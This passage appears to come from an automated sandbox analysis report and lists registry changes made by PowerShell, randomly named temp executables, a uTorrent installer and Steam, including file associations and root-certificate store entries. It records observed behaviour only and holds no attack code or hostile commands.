| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fc95478e-0000-0000-0000-d01200000000} | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" | C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fc95478e-0000-0000-0000-d01200000000}\MaxCapacity = "14116" | C:\Windows\Temp\rLJCaCpfIrfYjdgZ\RcEfqUwXlczHRfM\OhJJMVd.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell\Open | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\ = "Magnet URI" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.torrent | C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\steam\Shell | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent\Extension = ".torrent" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\ = "Torrent" | C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\DefaultIcon\ = "steam.exe" | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent\Content Type = "application/x-bittorrent" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\Content Type = "application/x-bittorrent-skin" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell\Open\Command\ = "\"C:\\Program Files (x86)\\Steam\\steam.exe\" -- \"%1\"" | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\open\command | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\ = "uTorrent" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\Content Type = "application/x-bittorrent-appinst" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Torrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\utorrent\\pro\\resources\\torrent-icon.ico" | C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\Shell\Open | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml\Extension = ".btsearch" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\ = "uTorrent" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\Shell\Open\Command | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\steam\ = "URL:steam protocol" | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent\Extension = ".torrent" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\steamlink\Shell\Open\Command | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\Shell\Open | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\ = "open" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\ = "open" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\URL Protocol | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Magnet\shell\open | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent\shell | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steamlink\DefaultIcon | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\maindoc.ico" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\bittorrent | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\steam\URL Protocol | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\steam\URL Protocol | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.torrent\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrentsearchdescription+xml\Extension = ".btsearch" | C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\Torrent_backup | C:\Users\Admin\AppData\Local\Temp\is-NRQ9F.tmp\utorrent.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431\Blob = 0f0000000100000014000000327fc447408de9bf596f83d4b2fa4b8e3e7097d8090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b060105050703076200000001000000200000006dc47172e01cbcb0bf62580d895fe2b8ac9ad4f873801e0c10b9c837d21eb1770b000000010000001e00000045006e00740072007500730074002000280032003000340038002900000014000000010000001400000055e481d11180bed889b908a331f9a1240916b9701d0000000100000010000000e871723e266f38af5d49cda2a502669c7e000000010000000800000000c001b39667d601030000000100000014000000503006091d97d4f5ae39f7cbe7927d7d652d343120000000010000002e0400003082042a30820312a00302010202043863def8300d06092a864886f70d01010505003081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f7269747920283230343829301e170d3939313232343137353035315a170d3239303732343134313531325a3081b431143012060355040a130b456e74727573742e6e65743140303e060355040b14377777772e656e74727573742e6e65742f4350535f3230343820696e636f72702e206279207265662e20286c696d697473206c6961622e2931253023060355040b131c286329203139393920456e74727573742e6e6574204c696d69746564313330310603550403132a456e74727573742e6e65742043657274696669636174696f6e20417574686f726974792028323034382930820122300d06092a864886f70d01010105000382010f003082010a0282010100ad4d4ba91286b2eaa320071516642a2b4bd1bf0b4a4d8eed8076a567b77840c07342c868c0db532bdd5eb8769835938b1a9d7c133a0e1f5bb71ecfe524141eb181a98d7db8cc6b4b03f1020cdcaba54024007f7494a19d0829b3880bf587779d55cde4c37ed76a64ab851486955b9732506f3dc8ba660ce3fcbdb849c176894919fdc0a8bd89a3672fc69fbc711960b82de92cc99076667b94e2af78d665535d3cd69cb2cf2903f92fa450b2d448ce0532558afdb2644c0ee4980775db7fdfb9085560853029f97b48a46986e3353f1e865d7a7a15bdef008e1522541700902693bc0e496891bff847d39d9542c10e4ddf6f26cfc3182162664370d6d5c007e10203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041455e481d11180bed889b908a331f9a1240916b970300d06092a864886f70d010105050003820101003b9b8f569b30e753997c7a79a74d97d7199590fb061fca337c46638f966624fa401b2127cae67273f24ffe3199fdc80c4c6853c680821398fab6adda5d3df1ce6ef6151194820cee3f95af11ab0fd72fde1f038f572c1ec9bb9a1a4495eb184fa61fcd7d57102f9b04095a84b56ed81d3ae1d69ed16c795e791c14c5e3d04c933b653ceddf3dbea6e5951ac3b519c3bd5e5bbbff23ef6819cb1293275c032d6f30d01eb61aacde5af7d1aaa827a6fe7981c479993357ba12b0a9e0426c93ca56defe6d840b088b7e8dead79821c6f3e73c792f5e9cd14c158de1ec2237cc9a430b97dc80908db3679b6f48081556cfbff12b7c5e9a76e95990c57c8335116551 | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9